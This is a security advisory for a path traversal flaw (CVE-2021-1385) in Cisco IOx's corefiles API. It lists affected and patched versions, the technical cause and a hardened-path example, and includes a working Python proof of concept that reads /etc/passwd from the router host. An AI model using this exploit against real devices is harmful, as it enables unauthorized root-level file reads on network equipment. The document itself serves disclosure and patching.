Cisco IOx - Application Environment Path Traversal Vulnerability (CVE-2021-1385)

Moderate
orange-cert-cc published GHSA-hhfw-6cm2-v3w5 Nov 16, 2021

Package

IOx (Cisco)

Affected versions

16.3.1
17.3.2

Patched versions

16.6.9
17.3.3

Description

Overview

IOx gives the ability to host containers on Cisco routers. Once enabled, the router exposes an API that allows installing, activating and starting containers.
core_dir is a directory that can be used by both the API and the container itself.

The API that allows retrieving these files is vulnerable to path traversal, allowing files on the host to be read (as root).
Also, a symlink created from the container in this directory is wrongly resolved by the API on the host (same issue as #3).

Impact

This results in arbitrary read with root privileges on the host filesystem.

Detail

The corefiles API uses getCoreFile for path resolution.
It gets the directory on the host and calculates the path from the core_filename provided by the user.

A regular expression prevents the user from providing a core_filename that does not start with a word character or a space.

But if the attacker can create a directory in their core_dir directory:

[root@guestshell guesshell]# cd /local/local1/core_dir/
[root@guestshell core_dir]# mkdir test

then a valid path such as test/../../../../../<path> can be provided by the user.
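An added example (not the advisory's or Cisco's code) contrasting the prefix-only regular-expression check described above with a containment check that resolves the candidate path (symlinks included) and requires it to stay under core_dir. The regex, the directory layout and the function names are constructed assumptions.

```python
import os
import re
import tempfile

# Assumption: the check described in the advisory only constrains the first
# character of core_filename (a word character or a space).
CORE_FILENAME_RE = re.compile(r"^[\w ]")


def get_core_file_vulnerable(core_dir: str, core_filename: str) -> str:
    """Prefix-only validation: 'test/../../secret.txt' passes because it
    starts with a word character, and the OS then resolves the '..' parts."""
    if not CORE_FILENAME_RE.match(core_filename):
        raise ValueError("invalid core_filename")
    return os.path.join(core_dir, core_filename)


def get_core_file_hardened(core_dir: str, core_filename: str) -> str:
    """Resolve with realpath (which also follows symlinks planted from the
    container) and require the result to stay inside core_dir."""
    base = os.path.realpath(core_dir)
    candidate = os.path.realpath(os.path.join(base, core_filename))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes core_dir: %r" % core_filename)
    return candidate


def demo() -> dict:
    """Constructed core_dir layout in a temp dir; exercises both resolvers."""
    root = tempfile.mkdtemp()
    core_dir = os.path.join(root, "core_dir")
    os.makedirs(os.path.join(core_dir, "test"))         # attacker-created directory
    secret = os.path.join(root, "secret.txt")            # stands in for a host-only file
    with open(secret, "w") as f:
        f.write("host-only data\n")
    os.symlink(secret, os.path.join(core_dir, "link"))   # symlink planted from the container
    with open(os.path.join(core_dir, "app.core"), "w") as f:
        f.write("legit core\n")

    results = {}
    traversal = "test/../../secret.txt"
    with open(get_core_file_vulnerable(core_dir, traversal)) as f:
        results["vuln_reads_host"] = f.read() == "host-only data\n"
    for name, arg in (("traversal", traversal), ("symlink", "link")):
        try:
            get_core_file_hardened(core_dir, arg)
            results["hardened_" + name] = "allowed"
        except PermissionError:
            results["hardened_" + name] = "blocked"
    results["hardened_legit"] = os.path.basename(get_core_file_hardened(core_dir, "app.core"))
    return results
```

Note that the hardened check rejects the symlink case as well as the '..' case, which is the second issue the advisory mentions.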

Proof of Concept

Here is a Python script that allows downloading files from the host. It requires the directory /local/local1/core_dir/test to exist on the container.

import requests
import base64

# Please replace with a valid login and password
pwd = base64.b64encode(b'<REDACTED>:<REDACTED>')
h = {'Authorization': b'Basic ' + pwd}

# Obtain an API token from the IOx token service
r = requests.post('https://192.168.1.39/iox/api/v2/hosting/tokenservice', headers=h, verify=False)
token = r.json()['token']['id']
headers = {'X-Token-Id': token}

# Traverse out of core_dir through the existing 'test' directory
r = requests.get('https://192.168.1.39/iox/api/v2/hosting/apps/guestshell/corefiles?corefile=test/../../../../../../../../../etc/passwd', headers=headers, verify=False)
res = r.text
print("File Content:\n%s" % res)

Solution

Security patch

Cisco fixed this vulnerability in the following releases:

  • 17.3(2.5) and later
  • 17.3.3 and later
  • 17.5(0.144) and later
  • 17.5.1 and later
  • 17.6.(0.17) and later
  • 17.6.1 and later

Workaround

There are no workarounds that address this vulnerability.

References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-pt-hWGcPf7g
https://nvd.nist.gov/vuln/detail/CVE-2021-1385

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group

Timeline

Date reported: November 27, 2020
Date fixed: March 24, 2021

Severity

Moderate

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE ID

CVE-2021-1385

Weaknesses